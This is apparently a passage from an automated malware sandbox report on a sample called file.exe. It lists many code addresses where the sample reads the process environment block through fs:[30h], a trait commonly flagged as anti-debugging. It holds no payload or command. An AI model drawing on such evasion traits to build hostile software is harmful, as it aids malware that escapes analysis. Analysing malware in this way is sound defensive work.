                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]4_2_0179035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]4_2_0179035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B8350 mov ecx, dword ptr fs:[00000030h]4_2_017B8350
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA352 mov eax, dword ptr fs:[00000030h]4_2_017DA352
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01792349 mov eax, dword ptr fs:[00000030h]4_2_01792349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170C310 mov ecx, dword ptr fs:[00000030h]4_2_0170C310
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01730310 mov ecx, dword ptr fs:[00000030h]4_2_01730310
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A30B mov eax, dword ptr fs:[00000030h]4_2_0174A30B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A30B mov eax, dword ptr fs:[00000030h]4_2_0174A30B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A30B mov eax, dword ptr fs:[00000030h]4_2_0174A30B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E3F0 mov eax, dword ptr fs:[00000030h]4_2_0172E3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E3F0 mov eax, dword ptr fs:[00000030h]4_2_0172E3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E3F0 mov eax, dword ptr fs:[00000030h]4_2_0172E3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017463FF mov eax, dword ptr fs:[00000030h]4_2_017463FF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017203E9 mov eax, dword ptr fs:[00000030h]4_2_017203E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3DB mov eax, dword ptr fs:[00000030h]4_2_017BE3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3DB mov eax, dword ptr fs:[00000030h]4_2_017BE3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3DB mov ecx, dword ptr fs:[00000030h]4_2_017BE3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3DB mov eax, dword ptr fs:[00000030h]4_2_017BE3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B43D4 mov eax, dword ptr fs:[00000030h]4_2_017B43D4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B43D4 mov eax, dword ptr fs:[00000030h]4_2_017B43D4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CC3CD mov eax, dword ptr fs:[00000030h]4_2_017CC3CD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]4_2_0171A3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]4_2_0171A3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]4_2_0171A3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]4_2_0171A3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]4_2_0171A3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A3C0 mov eax, dword ptr fs:[00000030h]4_2_0171A3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]4_2_017183C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]4_2_017183C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]4_2_017183C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017183C0 mov eax, dword ptr fs:[00000030h]4_2_017183C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017963C0 mov eax, dword ptr fs:[00000030h]4_2_017963C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01708397 mov eax, dword ptr fs:[00000030h]4_2_01708397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01708397 mov eax, dword ptr fs:[00000030h]4_2_01708397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01708397 mov eax, dword ptr fs:[00000030h]4_2_01708397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170E388 mov eax, dword ptr fs:[00000030h]4_2_0170E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170E388 mov eax, dword ptr fs:[00000030h]4_2_0170E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170E388 mov eax, dword ptr fs:[00000030h]4_2_0170E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173438F mov eax, dword ptr fs:[00000030h]4_2_0173438F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173438F mov eax, dword ptr fs:[00000030h]4_2_0173438F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0274 mov eax, dword ptr fs:[00000030h]4_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714260 mov eax, dword ptr fs:[00000030h]4_2_01714260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714260 mov eax, dword ptr fs:[00000030h]4_2_01714260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714260 mov eax, dword ptr fs:[00000030h]4_2_01714260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170826B mov eax, dword ptr fs:[00000030h]4_2_0170826B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170A250 mov eax, dword ptr fs:[00000030h]4_2_0170A250
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716259 mov eax, dword ptr fs:[00000030h]4_2_01716259
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798243 mov eax, dword ptr fs:[00000030h]4_2_01798243
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798243 mov ecx, dword ptr fs:[00000030h]4_2_01798243
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170823B mov eax, dword ptr fs:[00000030h]4_2_0170823B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017202E1 mov eax, dword ptr fs:[00000030h]4_2_017202E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017202E1 mov eax, dword ptr fs:[00000030h]4_2_017202E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017202E1 mov eax, dword ptr fs:[00000030h]4_2_017202E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]4_2_0171A2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]4_2_0171A2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]4_2_0171A2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]4_2_0171A2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A2C3 mov eax, dword ptr fs:[00000030h]4_2_0171A2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017202A0 mov eax, dword ptr fs:[00000030h]4_2_017202A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017202A0 mov eax, dword ptr fs:[00000030h]4_2_017202A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]4_2_017A62A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A62A0 mov ecx, dword ptr fs:[00000030h]4_2_017A62A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]4_2_017A62A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]4_2_017A62A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]4_2_017A62A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A62A0 mov eax, dword ptr fs:[00000030h]4_2_017A62A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E284 mov eax, dword ptr fs:[00000030h]4_2_0174E284
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E284 mov eax, dword ptr fs:[00000030h]4_2_0174E284
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01790283 mov eax, dword ptr fs:[00000030h]4_2_01790283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01790283 mov eax, dword ptr fs:[00000030h]4_2_01790283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01790283 mov eax, dword ptr fs:[00000030h]4_2_01790283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174656A mov eax, dword ptr fs:[00000030h]4_2_0174656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174656A mov eax, dword ptr fs:[00000030h]4_2_0174656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174656A mov eax, dword ptr fs:[00000030h]4_2_0174656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718550 mov eax, dword ptr fs:[00000030h]4_2_01718550
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718550 mov eax, dword ptr fs:[00000030h]4_2_01718550
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]4_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]4_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]4_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]4_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]4_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720535 mov eax, dword ptr fs:[00000030h]4_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]4_2_0173E53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]4_2_0173E53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]4_2_0173E53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]4_2_0173E53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E53E mov eax, dword ptr fs:[00000030h]4_2_0173E53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6500 mov eax, dword ptr fs:[00000030h]4_2_017A6500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]4_2_017E4500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]4_2_017E4500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]4_2_017E4500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]4_2_017E4500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]4_2_017E4500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]4_2_017E4500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4500 mov eax, dword ptr fs:[00000030h]4_2_017E4500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017125E0 mov eax, dword ptr fs:[00000030h]4_2_017125E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E5E7 mov eax, dword ptr fs:[00000030h]4_2_0173E5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C5ED mov eax, dword ptr fs:[00000030h]4_2_0174C5ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C5ED mov eax, dword ptr fs:[00000030h]4_2_0174C5ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017165D0 mov eax, dword ptr fs:[00000030h]4_2_017165D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A5D0 mov eax, dword ptr fs:[00000030h]4_2_0174A5D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A5D0 mov eax, dword ptr fs:[00000030h]4_2_0174A5D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E5CF mov eax, dword ptr fs:[00000030h]4_2_0174E5CF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E5CF mov eax, dword ptr fs:[00000030h]4_2_0174E5CF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017345B1 mov eax, dword ptr fs:[00000030h]4_2_017345B1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017345B1 mov eax, dword ptr fs:[00000030h]4_2_017345B1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017905A7 mov eax, dword ptr fs:[00000030h]4_2_017905A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017905A7 mov eax, dword ptr fs:[00000030h]4_2_017905A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017905A7 mov eax, dword ptr fs:[00000030h]4_2_017905A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E59C mov eax, dword ptr fs:[00000030h]4_2_0174E59C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01712582 mov eax, dword ptr fs:[00000030h]4_2_01712582
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01712582 mov ecx, dword ptr fs:[00000030h]4_2_01712582
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01744588 mov eax, dword ptr fs:[00000030h]4_2_01744588
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173A470 mov eax, dword ptr fs:[00000030h]4_2_0173A470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173A470 mov eax, dword ptr fs:[00000030h]4_2_0173A470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173A470 mov eax, dword ptr fs:[00000030h]4_2_0173A470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C460 mov ecx, dword ptr fs:[00000030h]4_2_0179C460
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173245A mov eax, dword ptr fs:[00000030h]4_2_0173245A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170645D mov eax, dword ptr fs:[00000030h]4_2_0170645D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E443 mov eax, dword ptr fs:[00000030h]4_2_0174E443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A430 mov eax, dword ptr fs:[00000030h]4_2_0174A430
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170E420 mov eax, dword ptr fs:[00000030h]4_2_0170E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170E420 mov eax, dword ptr fs:[00000030h]4_2_0170E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170E420 mov eax, dword ptr fs:[00000030h]4_2_0170E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170C427 mov eax, dword ptr fs:[00000030h]4_2_0170C427
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796420 mov eax, dword ptr fs:[00000030h]4_2_01796420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748402 mov eax, dword ptr fs:[00000030h]4_2_01748402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748402 mov eax, dword ptr fs:[00000030h]4_2_01748402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748402 mov eax, dword ptr fs:[00000030h]4_2_01748402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017104E5 mov ecx, dword ptr fs:[00000030h]4_2_017104E5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017444B0 mov ecx, dword ptr fs:[00000030h]4_2_017444B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A4B0 mov eax, dword ptr fs:[00000030h]4_2_0179A4B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017164AB mov eax, dword ptr fs:[00000030h]4_2_017164AB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718770 mov eax, dword ptr fs:[00000030h]4_2_01718770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720770 mov eax, dword ptr fs:[00000030h]4_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710750 mov eax, dword ptr fs:[00000030h]4_2_01710750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E75D mov eax, dword ptr fs:[00000030h]4_2_0179E75D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752750 mov eax, dword ptr fs:[00000030h]4_2_01752750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752750 mov eax, dword ptr fs:[00000030h]4_2_01752750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01794755 mov eax, dword ptr fs:[00000030h]4_2_01794755
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174674D mov esi, dword ptr fs:[00000030h]4_2_0174674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174674D mov eax, dword ptr fs:[00000030h]4_2_0174674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174674D mov eax, dword ptr fs:[00000030h]4_2_0174674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174273C mov eax, dword ptr fs:[00000030h]4_2_0174273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174273C mov ecx, dword ptr fs:[00000030h]4_2_0174273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174273C mov eax, dword ptr fs:[00000030h]4_2_0174273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178C730 mov eax, dword ptr fs:[00000030h]4_2_0178C730
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C720 mov eax, dword ptr fs:[00000030h]4_2_0174C720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C720 mov eax, dword ptr fs:[00000030h]4_2_0174C720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710710 mov eax, dword ptr fs:[00000030h]4_2_01710710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01740710 mov eax, dword ptr fs:[00000030h]4_2_01740710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C700 mov eax, dword ptr fs:[00000030h]4_2_0174C700
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017147FB mov eax, dword ptr fs:[00000030h]4_2_017147FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017147FB mov eax, dword ptr fs:[00000030h]4_2_017147FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E7E1 mov eax, dword ptr fs:[00000030h]4_2_0179E7E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017327ED mov eax, dword ptr fs:[00000030h]4_2_017327ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017327ED mov eax, dword ptr fs:[00000030h]4_2_017327ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017327ED mov eax, dword ptr fs:[00000030h]4_2_017327ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171C7C0 mov eax, dword ptr fs:[00000030h]4_2_0171C7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017907C3 mov eax, dword ptr fs:[00000030h]4_2_017907C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017107AF mov eax, dword ptr fs:[00000030h]4_2_017107AF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B678E mov eax, dword ptr fs:[00000030h]4_2_017B678E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01742674 mov eax, dword ptr fs:[00000030h]4_2_01742674
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D866E mov eax, dword ptr fs:[00000030h]4_2_017D866E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D866E mov eax, dword ptr fs:[00000030h]4_2_017D866E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A660 mov eax, dword ptr fs:[00000030h]4_2_0174A660
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A660 mov eax, dword ptr fs:[00000030h]4_2_0174A660
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172C640 mov eax, dword ptr fs:[00000030h]4_2_0172C640
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01746620 mov eax, dword ptr fs:[00000030h]4_2_01746620
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748620 mov eax, dword ptr fs:[00000030h]4_2_01748620
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E627 mov eax, dword ptr fs:[00000030h]4_2_0172E627
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171262C mov eax, dword ptr fs:[00000030h]4_2_0171262C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01752619 mov eax, dword ptr fs:[00000030h]4_2_01752619
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E609 mov eax, dword ptr fs:[00000030h]4_2_0178E609
